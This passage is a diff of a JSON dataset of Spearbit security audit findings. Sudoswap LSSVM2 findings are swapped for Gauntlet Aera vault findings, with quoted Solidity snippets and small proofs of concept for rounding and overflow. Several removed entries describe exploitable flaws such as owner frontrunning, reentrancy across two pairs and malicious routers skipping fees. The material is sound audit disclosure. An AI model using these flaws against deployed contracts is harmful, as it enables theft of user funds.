time between calls to calculateAndDistributeManagerFees() is relatively small. This could also slightly shift the spot price because the balance of one coin is lowered while the others remain the same. With fewer decimals the situation worsens, e.g. Gemini USD (GUSD) has 2 decimals, so the problem already occurs with a balance of 10_000 GUSD. Note: The rounding down is probably negligible in most cases. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < tokens.length; i++) { amounts[i] = (holdings[i] * managerFeeIndex) / ONE; // could be rounded down to 0 } ... } With 1 USDC in the vault and 2 hours between calculateAndDistributeManagerFees(), the fee for USDC is rounded down to 0.
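Concretely, using the values from the POC: managerFeeIndex = 7200 * 10**8 = 7.2e11, so the fee is (1e6 * 7.2e11) / 1e18 = 0.72, which integer division truncates to 0.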
This behavior is demonstrated in the following POC: import \"hardhat/console.sol\"; contract testcontract { uint256 constant ONE = 10**18; uint managementFee = 10**8; constructor() { // MAX_MANAGEMENT_FEE = 10**9; // 1 USDC uint holdings = 1E6; uint delay = 2 hours; uint managerFeeIndex = delay * managementFee; uint amounts = (holdings * managerFeeIndex) / ONE; console.log(\"Fee\",amounts); // fee is 0 } }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "One can attempt to steal a pair's ETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Anyone can pass the enrolled pair's address instead of a splitter address in bulkWithdrawFees() to effectively call the pair's withdrawAllETH() instead of a splitter's withdrawAllETH(). Anyone can attempt to steal/drain all the ETH from a pair. However, the pair's withdrawAllETH() sends ETH to the owner, which in this case is the settings contract. The settings contract is unable to receive ETH as currently implemented. So the attempt reverts.", + "title": "Missing nonReentrant modifier on initiateFinalization(), setManager() and claimManagerFees() functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The initiateFinalization() function is missing a nonReentrant modifier while calculateAndDistributeManagerFees() executes external calls. The same goes for the setManager() and claimManagerFees() functions.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "swap() could mix tokens with ETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function swap() adds the output of swapNFTsForToken() to the ethAmount. Although this only happens when order.isETHSell == true , this value could be set to the wrong value accidentally or on purpose. Then the number of received ERC20 tokens could be added to the ethAmount, which is clearly unwanted. The resulting ethAmount is returned to the user. Luckily the router (normally) doesn't have extra ETH so the impact should be limited. function swap(Order calldata swapOrder) external payable { uint256 ethAmount = msg.value; if (order.isETHSell && swapOrder.recycleETH) { ... outputAmount = pair.swapNFTsForToken(...); ... ethAmount += outputAmount; ... } ... // Send excess ETH back to token recipient if (ethAmount > 0) { payable(swapOrder.tokenRecipient).safeTransferETH(ethAmount); } }", + "title": "Potential division by 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "If the balance (e.g. holdings[]) of a token is 0 in deposit(), then the division by holdings[] would cause a revert. Note: Function withdraw() has similar code, but when holdings[] == 0 it's not possible to withdraw() anyway. Note: The current Mannon vault code will not allow the balances to be 0. Note: Although not used in the current code, in order to do a deregisterTokens(), Balancer requires the balance to be 0. Additionally, refer to the following Balancer documentation about the-vault#deregistertokens. The worst case scenario is deposit() not working. function deposit(uint256[] calldata amounts) ... { ...
for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { depositToken(tokens[i], amounts[i]); uint256 newBalance = holdings[i] + amounts[i]; newWeights[i] = (weights[i] * newBalance) / holdings[i]; // would revert if holdings[i] == 0 } ... ... } Similar divisions by 0 could occur in getWeightChangeRatio(). The function is called from updateWeightsGradually(). If this is due to targetWeight being 0, then it is the desired result. The current weight should not be 0 due to Balancer checks. function getWeightChangeRatio(uint256 weight, uint256 targetWeight) ... { return weight > targetWeight ? (ONE * weight) / targetWeight : (ONE * targetWeight) / weight; // could revert if targetWeight == 0 // could revert if weight == 0 }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Using a single tokenRecipient in VeryFastRouter could result in locked NFTs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "VeryFastRouter uses a single tokenRecipient address for both ETH/tokens and NFTs, unlike LSSVMRouter which uses a separate tokenRecipient and nftRecipient. It is error-prone to have a single tokenRecipient receive both tokens and NFTs, especially when the other/existing LSSVMRouter has a separate nftRecipient. VeryFastRouter.swap() sends both sell order tokens to tokenRe- cipient and buy order NFTs to tokenRecipient. Front-ends integrating with both routers (or migrating to the new one) may surprise users by sending both tokens+NFTs to the same address when interacting with this router. This coupled with the use of nft.transferFrom() may result in NFTs being sent to contracts that are not ERC-721 receivers and get them locked forever.", + "title": "Use ManagedPoolFactory instead of BaseManagedPoolFactory to deploy the Balancer pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Currently the Aera Vault is using BaseManagedPoolFactory as the factory to deploy the Balancer pool, while Balancer's documentation recommends and encourages the usage of ManagedPoolFactory. Quoting the doc inside the BaseManagedPoolFactory: This is a base factory designed to be called from other factories to deploy a ManagedPool with a particular controller/owner. It should NOT be used directly to deploy ManagedPools without controllers. ManagedPools controlled by EOAs would be very dangerous for LPs. There are no restrictions on what the managers can do, so a malicious manager could easily manipulate prices and drain the pool. In this design, other controller-specific factories will deploy a pool controller, then call this factory to deploy the pool, passing in the controller as the owner.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Owner can mislead users by abusing changeSpotPrice() and changeDelta()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A malicious owner could set up a pair which promises to buy NFTs for high prices. As soon as someone tries to trade, the owner could frontrun the transaction by setting the spotprice to 0 and gets the NFT for free. Both changeSpotPrice() and changeDelta() can be used to immediately change trade parameters where the aftereffects depends on the curve being used.
Note: The swapNFTsForToken() parameter minExpectedTokenOutput and swapTokenForSpecificNFTs() param- eter maxExpectedTokenInput protect users against sudden price changes. But users might not always set them in an optimal way. A design goal of the project team is that the pool owner can quickly respond to changing market conditions, to prevent unnecessary losses. function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { ... } function changeDelta(uint128 newDelta) external onlyOwner { ... }", + "title": "Adopt the two-step ownership transfer pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "To prevent the Aera vault Owner, i.e. the Treasury, from calling renounceOwnership() and effectively breaking vault critical functions such as withdraw() and finalize(), the renounceOwnership() function is explicitly overridden to revert the transaction every time. However, the transferOwnership() function may also lead to the same issue if the ownership is transferred to an uncontrollable address because of human errors or attacks on the Treasury.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Pair may receive less ETH trade fees than expected under certain conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Depending on the values of protocol fee and royalties, if _feeRecipient == _assetRecipient, the pair will receive less trade fees than expected. Assume a scenario where inputAmount == 100, protocolFee == 30, royaltyTotal == 60 and tradeFeeAmount == 20. This will result in a revert because of underflow in saleAmount -= tradeFeeAmount; when _feeRecipient != _assetRecipient. However, when _feeRecipient == _assetRecipient, the pair will receive trade fees of 100 - 30 - 60 = 10, whereas it normally would have expected 20.", + "title": "Implement zero-address check for manager_", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "There are no zero-address checks inside the constructor for the manager_ parameter. If manager_ becomes the zero address, then calls to calculateAndDistributeManagerFees will burn tokens (transfer them to address(0)).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "Swapping tokens/ETH for NFTs may exhibit unexpected behavior for certain values of input amount, trade fees and royalties", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The _pullTokenInputAndPayProtocolFee() function pulls ERC20/ETH from caller/router and pays protocol fees, trade fees and royalties proportionately. Trade fees have a threshold of MAX_FEE == 50%, which allows 2*fee to be 100%. Royalty amounts could technically be any percentage as well. This allows edge cases where the protocol fee, trade fee and royalty amounts add up to be > inputAmount. In LSSVMPairERC20, the ordering of subtracting/transferring the protocolFee and royaltyTotal first causes the final attempted transfer of tradeFeeAmount to either revert because of unavailable funds or uses any balance funds from the pair itself.
In LSSVMPairETH, the ordering of subtracting/transferring the tradeFees and royaltyTotal first causes the final attempted transfer of protocolFee to either revert because of unavailable funds or uses any balance funds from the pair itself.", + "title": "Simplify tracking of managerFeeIndex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The calculateAndDistributeManagerFees() function uses updateManagerFeeIndex() to keep track of management fees. It keeps track of both managerFeeIndex and lastFeeCheckpoint in storage variables (e.g. costing SLOAD/SSTORE). However, because managementFee is immutable this can be simplified to one storage variable, saving gas and improving code legibility. uint256 public immutable managementFee; // can't be changed function calculateAndDistributeManagerFees() internal { updateManagerFeeIndex(); ... if (managerFeeIndex == 0) { return; } ... // use managerFeeIndex ... managerFeeIndex = 0; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; lastFeeCheckpoint = block.timestamp.toUint64(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "NFTs may be exchanged for 0 tokens when price decreases too much", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The sale of multiple NFTs, in combination with linear curves, results in a price decrease. When the resulting price is below 0, then getSellInfo() calculates how many NFTs are required to reach a price of 0. However, the complete number of NFTs is transferred from the originator of the transaction, even while the last few NFTs are worth 0. This might be undesirable for the originator. function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 totalPriceDecrease = delta * numItems; if (spotPrice < totalPriceDecrease) { ... uint256 numItemsTillZeroPrice = spotPrice / delta + 1; numItems = numItemsTillZeroPrice; } }", + "title": "Directly call getTokensData() from returnFunds()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The function returnFunds() calls getHoldings() and getTokens(). Both functions call getTokensData(), thus wasting gas unnecessarily. function returnFunds() internal returns (uint256[] memory amounts) { uint256[] memory holdings = getHoldings(); IERC20[] memory tokens = getTokens(); ... } function getHoldings() public view override returns (uint256[] memory amounts) { (, amounts, ) = getTokensData(); } function getTokens() public view override returns (IERC20[] memory tokens) { (tokens, , ) = getTokensData(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "balanceOf() can be circumvented via reentrancy and two pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A reentrancy issue can occur if two pairs with the same ERC1155 NFTid are deployed. Via a call to swap NFTs, the ERC1155 callback onERC1155BatchReceived() is called. This callback can start a second NFT swap via a second pair. As the second pair has its own reentrancy modifier, this is allowed. This way the balanceOf() check of _takeNFTsFromSender() can be circumvented.
If a reentrant call, to a second pair, supplies a sufficient amount of NFTs then the balanceOf() check of the original call can be satisfied at the same time. We haven't found a realistic scenario to abuse this with the current routers. Permissionless routers will certainly increase the risk as they can abuse isRouter == true. If the router is mali- cious then it also has other ways to steal the NFTs; however with the reentrancy scenario it might be less obvious this is happening. Note: ERC777 tokens also contain such a callback and have the same interface as ERC20 so they could be used in an ERC20 pair. function _takeNFTsFromSender(IERC1155 _nft, uint256 numNFTs, bool isRouter, address routerCaller) ... { ... if (isRouter) { ... uint256 beforeBalance = _nft.balanceOf(_assetRecipient, _nftId); ... router.pairTransferERC1155From(...); // reentrancy with other pair require((_nft.balanceOf(_assetRecipient, _nftId) - beforeBalance) == numNFTs, ...); // circumvented } else { ... } ,! }", + "title": "Change uint32 and uint64 to uint256", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The contract contains a few variables/constants that are smaller than uint256: noticePeriod, noticeTimeoutAt and lastFeeCheckpoint. This doesn't actually save gas because they are not part of a struct and still take up a storage slot. It even costs more gas because additional bits have to be stripped off. Additionally, there is a very small risk of lastFeeCheckpoint wrapping to 0 in the updateManagerFeeIndex() function. If that happened, managerFeeIndex would get far too large and too many fees would be paid out. Finally, using uint256 simplifies the code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { ... uint32 public immutable noticePeriod; ... uint64 public noticeTimeoutAt; ... uint64 public lastFeeCheckpoint = type(uint64).max; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; // could get large when lastFeeCheckpoint wraps lastFeeCheckpoint = block.timestamp.toUint64(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "Function call() is risky and can be restricted further", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function call() is powerful and thus risky. To reduce the risk it can be restricted further by dis- allowing potentially dangerous function selectors. This is also a step closer to introducing permissionless routers.
function call(address payable target, bytes calldata data) external onlyOwner { ILSSVMPairFactoryLike _factory = factory(); require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result,) = target.call{value: 0}(data); require(result, \"Call failed\"); } 16", + "title": "Use block.timestamp directly instead of assigning it to a temporary variable.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "It is preferable to use block.timestamp directly in your code instead of assigning it to a temporary variable as it only uses 2 gas.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect newSpotPrice and newDelta may be obtained due to unsafe downcasts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "When calculating newSpotPrice in getBuyInfo(), an unsafe downcast from uint256 into uint128 may occur and silently overflow, leading to much less value for newSpotPrice than expected. function getBuyInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 inputValue, uint256 tradeFee, uint256 protocolFee ) { ... } // get the pair's virtual nft and token reserves uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // calculate the amount to send in uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... // set the new virtual reserves newSpotPrice = uint128(spotPrice + inputValueWithoutFee); // token reserve ... Same happens when calculating newDelta in getSellInfo(): function getSellInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 outputValue, uint256 tradeFee, uint256 protocolFee ) { PoC ... // get the pair's virtual nft and eth/erc20 balance uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // set the new virtual reserves newDelta = uint128(nftBalance + numItems); // nft reserve ... Proof of concept about how this wouldn't revert but silently overflow: 17 import \"hardhat/console.sol\"; contract test{ constructor() { uint256 a = type(uint128).max; uint256 b = 2; uint128 c = uint128(a + b); console.log(c); // c == 1, no error } }", + "title": "Consider replacing pool.getPoolId() with bytes32 public immutable poolId to save gas and ex- ternal calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current implementation of Aera Vault always calls pool.getPoolId() or indirectly getPoolId() to retrieve the ID of the immutable state variable pool that has been declared at constructor time. The pool.getPoolId() is a getter function defined in the Balancer BasePool contract: function getPoolId() public view override returns (bytes32) { return _poolId; } Inside the same BasePool contract the _poolId is defined as immutable which means that after creating a pool it will never change. 
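For this reason it is possible to apply the same logic inside the Aera Vault and use an immutable variable, avoiding external calls and saving gas. A minimal sketch of the caching (a hypothetical constructor fragment; pool is the vault's existing immutable pool reference): bytes32 public immutable poolId; constructor(...) { // ... existing code that deploys the ManagedPool and sets pool ... poolId = pool.getPoolId(); // cache once; Balancer's _poolId never changes after creation }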
", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "Fewer checks in pairTransferNFTFrom() and pairTransferERC1155From() than in pairTransfer- ERC20From()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions pairTransferNFTFrom() and pairTransferERC1155From() don't verify that the cor- rect type of pair is used, whereas pairTransferERC20From() does. This means actions could be attempted on the wrong type of pairs. These could succeed for example if a NFT is used that supports both ERC721 and ERC1155. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\" The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... } function pairTransferNFTFrom(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferERC1155From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... }", + "title": "Save values in temporary variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "We observed multiple occurrences in the codebase where .length was used in for loops. This could lead to more gas consumption as .length gets called repeatedly until the for loop finishes. When indexed variables are used multiple times inside the loop in a read-only way, these can be stored in a temporary variable to save some gas. for (uint256 i = 0; i < tokens.length; i++) { // tokens.length has to be calculated repeatedly ... ... = tokens[i].balanceOf(...); tokens[i].safeTransfer(owner(), ...); } // tokens[i] has to be evaluated multiple times", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Gas Optimization" ] }, { - "title": "A malicious collection admin can reclaim a pair at any time to deny enhanced setting royalties", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A collection admin can forcibly/selectively call reclaimPair() prematurely (before the advertised and agreed upon lockup period) to unilaterally break the settings contract at any time. This will effectively lead to a DoS to the pair owner for the enhanced royalty terms of the setting despite paying the upfront fee and agreeing to a fee split in return. This is because the unlockTime is enforced only on the previous pair owner and not on collection admins. A malicious collection admin can advertise very attractive setting royalty terms to entice pair owners to pay a high upfront fee to sign-up for their settings contract but then force-end the contract prematurely. This will lead to the pair owner losing the paid upfront fee and the promised attractive royalty terms.
A lax pair owner who may not be actively monitoring SettingsRemovedForPair events before the lockup period will be surprised at the prematurely forced settings contract termination by the collection admin, loss of their earlier paid upfront fee and any payments of default royalty instead of their expected enhanced amounts.", + "title": "Aera could be prone to out-of-gas transaction revert when managing a high number of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Balancer ManagedPool used by Aera has a max limit of 50 tokens. Functions like initialDeposit(), deposit(), withdraw() and finalize() involve numerous external direct and indirect (made by Balancer itself when called by Aera) calls and math calculations that are done for each token managed by the pool. The functions deposit() and withdraw() are especially gas intensive, given that they also internally call calculateAndDistributeManagerFees(), which will transfer, for each token, a management fee to the manager. For these reasons Aera should be aware that a high number of tokens managed by the Aera Vault could lead to out-of-gas reverts (the maximum block gas limit depends on which chain the project will be deployed to).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "PropertyCheckers and Settings not sufficiently restricted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The LSSVMPairFactory accepts any address for external contracts which contain critical logic but there are no sanity checks done on them. These are the _bondingCurve, _propertyChecker and settings con- tracts. The contracts could perhaps be updated later via a proxy pattern or a create2/selfdestruct pattern which means that it's difficult to completely rely on them. Both _propertyChecker and settings contracts have a factory associated: PropertyCheckerFactory and StandardSettingsFactory. It is straightforward to enforce that only contracts created by the factory can be used. For the bondingCurves there is a whitelist that limits the risk. function createPairERC721ETH(..., ICurve _bondingCurve, ..., address _propertyChecker, ...) ... { ... // no checks on _bondingCurve and _propertyChecker } function toggleSettingsForCollection(address settings, address collectionAddress, bool enable) public { ... // no checks on settings } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { bondingCurveAllowed[bondingCurve] = isAllowed; emit BondingCurveStatusUpdate(bondingCurve, isAllowed); }", + "title": "Use a consistent way to call getNormalizedWeights()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The functions deposit() and withdraw() call the function getNormalizedWeights(), while the functions updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent. function deposit(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Deposit(amounts, getNormalizedWeights()); } function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Withdraw(amounts, allowances, getNormalizedWeights()); } function updateWeightsGradually(...) ... { ...
uint256[] memory weights = pool.getNormalizedWeights(); ... } function cancelWeightUpdates() ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function getNormalizedWeights() ... { return pool.getNormalizedWeights(); }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "A malicious router can skip transfer of royalties and protocol fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A malicious router, if accidentally/intentionally whitelisted by the protocol, may implement pair- TransferERC20From() functions which do not actually transfer the number of tokens as expected. This is within the protocol's threat model as evidenced by the use of before-after balance checks on the _assetRecipient for saleAmount. However, similar before-after balance checks are missing for transfers of royalties and protocol fee payments. the protocol/factory intention- Royalty recipients do not receive their royalties from the malicious router if ally/accidentally whitelists one. The protocol/factory may also accidentally whitelist a malicious router that does not transfer even the protocol fee.", + "title": "Add function disableTrading() to IManagerAPI.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The disableTrading() function can also be called by managers because of the onlyOwnerOrManager modifier. However, in AeraVaultV1.sol it is located in the PROTOCOL API section. It is also not present in IManagerAPI.sol. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { /// PROTOCOL API /// function disableTrading() ... onlyOwnerOrManager ... { ... } /// MANAGER API /// } interface IManagerAPI { function updateWeightsGradually(...) external; function cancelWeightUpdates() external; function setSwapFee(uint256 newSwapFee) external; function claimManagerFees() external; } // disableTrading() isn't present", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Malicious front-end can sneak intermediate ownership changes to perform unauthorized actions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "LSSVMPair implements an onlyOwner multicall function to allow owner to batch multiple calls. Natspec indicates that this is \"Intended for withdrawing/altering pool pricing in one tx, only callable by owner, can- not change owner.\" The check require(owner() == msg.sender, \"Ownership cannot be changed in multi- call\"); with a preceding comment \"Prevent multicall from malicious frontend sneaking in ownership change\" indicates the intent of the check and that a malicious front-end is within the threat model. While the post-loop check prevents malicious front-ends from executing ownership changing calls that attempt to persist beyond the multicall, this still allows one to sneak in an intermediate ownership change during a call -> perform malicious actions under the new unauthorized malicious owner within onOwnershipTransferred() callback -> change ownership back to originally authorized msg.sender owner before returning from the callback and successfully executing any subsequent (onlyOwner) calls and the existing check.
While a malicious front-end could introduce many attack vectors that are out-of-scope for detecting/preventing in backend contracts, an unauthorized ownership change seems like a critical one and warrants additional checks for onlyOwner multicall to prevent malicious actions from being executed in the context of any newly/temporarily unauthorized owner.", + "title": "Doublecheck layout functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Different ways are used to lay out functions. Especially the part between ( ... ) and between ) ... { is sometimes done on one line and sometimes split across multiple lines. Also, { is sometimes at the end of a line and sometimes at the beginning. Although the layout is not disturbing, it might be useful to doublecheck it. Here are a few examples of different layouts: function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function depositToken(IERC20 token, uint256 amount) internal { ... } function updatePoolBalance( uint256[] memory amounts, IBVault.PoolBalanceOpKind kind ) internal { ... } function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function updateWeightsGradually( uint256[] calldata targetWeights, uint256 startTime, uint256 endTime ) external override onlyManager whenInitialized whenNotFinalizing { ... } function getWeightChangeRatio(uint256 weight, uint256 targetWeight) internal pure returns (uint256) { } ...", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing override in authAllowedForToken prevents authorized admins from toggling settings and reclaiming pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Manifold admins are incorrectly not allowed by authAllowedForToken to toggle settings and reclaim their authorized pairs in the protocol context. authAllowedForToken checks for different admin overrides including admin interfaces of NFT marketplaces Nifty, Foundation, Digitalax and ArtBlocks. However, the protocol sup- ports royalties from other marketplaces of Manifold, Rarible, SuperRare and Zora. Of those, Manifold does have getAdmins() interface which is not considered in authAllowedForToken. And it is not certain that the others don't.", + "title": "Use Math library functions in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the AeraVaultV1 contract, OZ's Math library functions are attached to the type uint256. The min function is used as a member function whereas the max function is used as a library function.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Misdirected transfers to invalid pair variants or non-pair recipients may lead to loss/lock of NFTs/tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions depositNFTs() and depositERC20() allow deposits of ERC 721 NFTs and ERC20 tokens after pair creation. While they check that the deposit recipient is a valid pair/variant for emitting an event, the deposit transfers happen prior to the check and without the same validation.
With dual home tokens (see weird-erc20), the emit could be skipped when the \"other\" token is transferred. Also, the isPair() check in depositNFTs() does not specifically check if the pair variant is ERC721_ERC20 or ERC721_ETH. This allows accidentally misdirected deposits to invalid pair variants or non-pair recipients leading to loss/lock of NFTs/tokens.", + "title": "Separation of concerns Owner and Manager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Owner and Manager roles are separated on purpose. Role separation usually helps to improve quality. However, this separation can be broken if the Owner calls setManager(). This way the Owner can set the Manager to one of his own addresses, perform Manager functions (for example setSwapFee()) and perhaps set it back to the original Manager. Note: as everything happens on chain, these actions can be tracked. function setManager(address newManager) external override onlyOwner { if (newManager == address(0)) { revert Aera__ManagerIsZeroAddress(); } if (initialized && noticeTimeoutAt == 0) { calculateAndDistributeManagerFees(); } emit ManagerChanged(manager, newManager); manager = newManager; }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "authAllowedForToken() returns prematurely in certain scenarios causing an authentication DoS", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Tokens listed on Nifty or Foundation (therefore returning a valid niftyRegistry or foundationTrea- sury) where the proposedAuthAddress is not a valid Nifty sender or a valid Foundation Treasury admin will cause an authentication DoS if the token were also listed on Digitalax or ArtBlocks and the proposedAuthAddress had admin roles on those platforms. This happens because the return values of valid and isAdmin for isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) respectively are returned as-is instead of returning only if/when they are true but continuing the checks for authorization otherwise (if/when they are false) on Digitalax and ArtBlocks. toggleSettingsForCollection and reclaimPair (which utilize authAllowedForToken) would incorrectly fail for valid proposedAuthAddress in such scenarios. 21 return", + "title": "Add modifier whenInitialized to function finalize()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The function finalize() does not have the modifier whenInitialized while most other functions have this modifier. This does not create any real issues because the function contains the check noticeTimeoutAt == 0 which can only be skipped after initiateFinalization(), and this function does have the whenInitialized modifier. function finalize() external override nonReentrant onlyOwner { // no modifier whenInitialized if (noticeTimeoutAt == 0) { // can 